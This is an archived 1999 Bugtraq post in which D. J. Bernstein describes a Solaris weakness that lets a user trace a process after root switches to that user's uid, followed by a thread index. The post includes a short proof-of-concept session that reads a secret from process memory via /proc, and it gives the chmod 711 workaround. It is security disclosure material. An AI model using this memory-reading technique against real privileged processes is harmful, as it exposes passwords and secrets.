Bugtraq mailing list archives
Tracing by uid u after root does setuid(u)
From: djb () CR YP TO (D. J. Bernstein)
Date: Wed, 13 Jan 1999 02:39:16 -0000
Neale Banks writes:
You are proposing that some significant security is obtained by making an executable file unreadable?
Here's a sample session under Solaris: # head -1 > login.c static char secret[10]; main() { read(0,secret,10); setuid(1); sleep(60); } # gcc -o login login.c # echo OSSIFRAGE | ./login & 25145 # nm login | grep secret [35] | 133268| 10|OBJT |LOCL |0 |17 |secret # su daemon -c '(lseek 133268; dd bs=10 count=1) < /proc/25145' OSSIFRAGE 1+0 records in 1+0 records out That's right: tracing is allowed even though there hasn't been an exec. Many programs that use setuid() can be exploited this way. For example, you lose all security if you use the chdir()/setuid() mechanism suggested by Steve Bellovin and Gene Spafford. Fortunately, as I said, there's a trivial workaround. All you have to do is make the binaries unreadable: # chmod 711 login # su daemon -c ': < /proc/25145' su: /proc/25145: cannot open Perhaps the Sun kernel developers aren't aware that it's bad to allow tracing after a program changes uid, but obviously they are aware that it's bad to allow tracing of an unreadable program. In fact, the /proc documentation identifies this as a security measure. I'm not saying that unreadability provides some sort of magic immunity against any conceivable OS bug; but I haven't found any systems where it's inadequate. ---Dan
Current thread:
- Re: ff.core exploit on Solaris (2.)7, (continued)
- Re: ff.core exploit on Solaris (2.)7 Casper Dik (Jan 15)
- L0pht tmp tool and (mini) Advisory Dr. Mudge (Jan 08)
- Re: Anonymous Qmail Denial of Service Antonomasia (Jan 07)
- Re: Anonymous Qmail Denial of Service D. J. Bernstein (Jan 09)
- Re: Anonymous Qmail Denial of Service Wietse Venema (Jan 10)
- Keeping Solaris up-to-date John RIddoch (Jan 11)
- Keeping any up-to-date? Randolf-Heiko Skerka (Jan 13)
- Re: Keeping any up-to-date? Ciaran Deignan (Jan 15)
- Re: Keeping any up-to-date? Peter May (Jan 15)
- Administrivia Aleph One (Jan 12)
- Tracing by uid u after root does setuid(u) D. J. Bernstein (Jan 12)
- Re: Tracing by uid u after root does setuid(u) Wietse Venema (Jan 13)
- Re: Tracing by uid u after root does setuid(u) Casper Dik (Jan 13)
- Re: Tracing by uid u after root does setuid(u) James Mathiesen (Jan 15)
- Re: Tracing by uid u after root does setuid(u) Gene Spafford (Jan 13)
- Solaris 7 naming... Isaac (Jan 12)
- [(PM) PM3s Die - Comfirmed DoS Attack (fwd)] David TILLOY (Jan 13)
- Government report suggests backdoors for law enforcement Darren Reed (Jan 13)